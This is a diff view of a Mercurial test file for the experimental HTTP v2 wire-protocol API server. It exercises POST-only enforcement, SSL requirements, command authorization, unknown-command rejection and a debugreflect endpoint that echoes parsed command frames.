236 236 s> host: $LOCALIP:$HGPORT\r\n (glob)
237 237 s> \r\n
238 238 s> makefile('rb', None)
239 239 s> HTTP/1.1 405 Method Not Allowed\r\n
240 240 s> Server: testing stub value\r\n
241 241 s> Date: $HTTP_DATE$\r\n
242 242 s> Allow: POST\r\n
243 243 s> Content-Length: 30\r\n
244 244 s> \r\n
245 245 s> commands require POST requests
246 246
247 247 SSL required by default
248 248
249 249 $ send << EOF
250 250 > httprequest POST api/$HTTPV2/rw/customreadonly
251 251 > user-agent: test
252 252 > EOF
253 253 using raw connection to peer
254 254 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
255 255 s> Accept-Encoding: identity\r\n
256 256 s> user-agent: test\r\n
257 257 s> host: $LOCALIP:$HGPORT\r\n (glob)
258 258 s> \r\n
259 259 s> makefile('rb', None)
260 260 s> HTTP/1.1 403 ssl required\r\n
261 261 s> Server: testing stub value\r\n
262 262 s> Date: $HTTP_DATE$\r\n
263 263 s> Content-Length: 17\r\n
264 264 s> \r\n
265 265 s> permission denied
266 266
267 267 Restart server to allow non-ssl read-write operations
268 268
269 269 $ killdaemons.py
270 270 $ cat > server/.hg/hgrc << EOF
271 271 > [experimental]
272 272 > web.apiserver = true
273 273 > web.api.http-v2 = true
274 274 > [web]
275 275 > push_ssl = false
276 276 > allow-push = *
277 277 > EOF
278 278
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
280 280 $ cat hg.pid > $DAEMON_PIDS
281 281
282 282 Authorized request for valid read-write command works
283 283
284 284 $ send << EOF
285 285 > httprequest POST api/$HTTPV2/rw/customreadonly
286 286 > user-agent: test
287 287 > accept: $MEDIATYPE
288 288 > content-type: $MEDIATYPE
289 289 > frame command-name eos customreadonly
290 290 > EOF
291 291 using raw connection to peer
292 292 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
293 293 s> Accept-Encoding: identity\r\n
294 294 s> accept: application/mercurial-exp-framing-0001\r\n
295 295 s> content-type: application/mercurial-exp-framing-0001\r\n
296 296 s> user-agent: test\r\n
297 297 s> content-length: 18\r\n
298 298 s> host: $LOCALIP:$HGPORT\r\n (glob)
299 299 s> \r\n
300 300 s> \x0e\x00\x00\x11customreadonly
301 301 s> makefile('rb', None)
302 302 s> HTTP/1.1 200 OK\r\n
303 303 s> Server: testing stub value\r\n
304 304 s> Date: $HTTP_DATE$\r\n
305 305 s> Content-Type: text/plain\r\n
306 306 s> Content-Length: 18\r\n
307 307 s> \r\n
308 308 s> rw/customreadonly\n
309 309
310 310 Authorized request for unknown command is rejected
311 311
312 312 $ send << EOF
313 313 > httprequest POST api/$HTTPV2/rw/badcommand
314 314 > user-agent: test
315 315 > accept: $MEDIATYPE
316 316 > EOF
317 317 using raw connection to peer
318 318 s> POST /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
319 319 s> Accept-Encoding: identity\r\n
320 320 s> accept: application/mercurial-exp-framing-0001\r\n
321 321 s> user-agent: test\r\n
322 322 s> host: $LOCALIP:$HGPORT\r\n (glob)
323 323 s> \r\n
324 324 s> makefile('rb', None)
325 325 s> HTTP/1.1 404 Not Found\r\n
326 326 s> Server: testing stub value\r\n
327 327 s> Date: $HTTP_DATE$\r\n
328 328 s> Content-Type: text/plain\r\n
329 329 s> Content-Length: 42\r\n
330 330 s> \r\n
331 331 s> unknown wire protocol command: badcommand\n
332
333 debugreflect isn't enabled by default
334
335 $ send << EOF
336 > httprequest POST api/$HTTPV2/ro/debugreflect
337 > user-agent: test
338 > EOF
339 using raw connection to peer
340 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
341 s> Accept-Encoding: identity\r\n
342 s> user-agent: test\r\n
343 s> host: $LOCALIP:$HGPORT\r\n (glob)
344 s> \r\n
345 s> makefile('rb', None)
346 s> HTTP/1.1 404 Not Found\r\n
347 s> Server: testing stub value\r\n
348 s> Date: $HTTP_DATE$\r\n
349 s> Content-Type: text/plain\r\n
350 s> Content-Length: 34\r\n
351 s> \r\n
352 s> debugreflect service not available
353
354 Restart server to get debugreflect endpoint
355
356 $ killdaemons.py
357 $ cat > server/.hg/hgrc << EOF
358 > [experimental]
359 > web.apiserver = true
360 > web.api.debugreflect = true
361 > web.api.http-v2 = true
362 > [web]
363 > push_ssl = false
364 > allow-push = *
365 > EOF
366
367 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
368 $ cat hg.pid > $DAEMON_PIDS
369
370 Command frames can be reflected via debugreflect
371
372 $ send << EOF
373 > httprequest POST api/$HTTPV2/ro/debugreflect
374 > accept: $MEDIATYPE
375 > content-type: $MEDIATYPE
376 > user-agent: test
377 > frame command-name have-args command1
378 > frame command-argument 0 \x03\x00\x04\x00fooval1
379 > frame command-argument eoa \x04\x00\x03\x00bar1val
380 > EOF
381 using raw connection to peer
382 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
383 s> Accept-Encoding: identity\r\n
384 s> accept: application/mercurial-exp-framing-0001\r\n
385 s> content-type: application/mercurial-exp-framing-0001\r\n
386 s> user-agent: test\r\n
387 s> content-length: 42\r\n
388 s> host: $LOCALIP:$HGPORT\r\n (glob)
389 s> \r\n
390 s> \x08\x00\x00\x12command1\x0b\x00\x00 \x03\x00\x04\x00fooval1\x0b\x00\x00"\x04\x00\x03\x00bar1val
391 s> makefile('rb', None)
392 s> HTTP/1.1 200 OK\r\n
393 s> Server: testing stub value\r\n
394 s> Date: $HTTP_DATE$\r\n
395 s> Content-Type: text/plain\r\n
396 s> Content-Length: 291\r\n
397 s> \r\n
398 s> received: 1 2 command1\n
399 s> ["wantframe", {"state": "command-receiving-args"}]\n
400 s> received: 2 0 \x03\x00\x04\x00fooval1\n
401 s> ["wantframe", {"state": "command-receiving-args"}]\n
402 s> received: 2 2 \x04\x00\x03\x00bar1val\n
403 s> ["runcommand", {"args": {"bar1": "val", "foo": "val1"}, "command": "command1", "data": null}]\n
404 s> received: <no frame>
405
406 $ cat error.log
General Comments 0
You need to be logged in to leave comments. Login now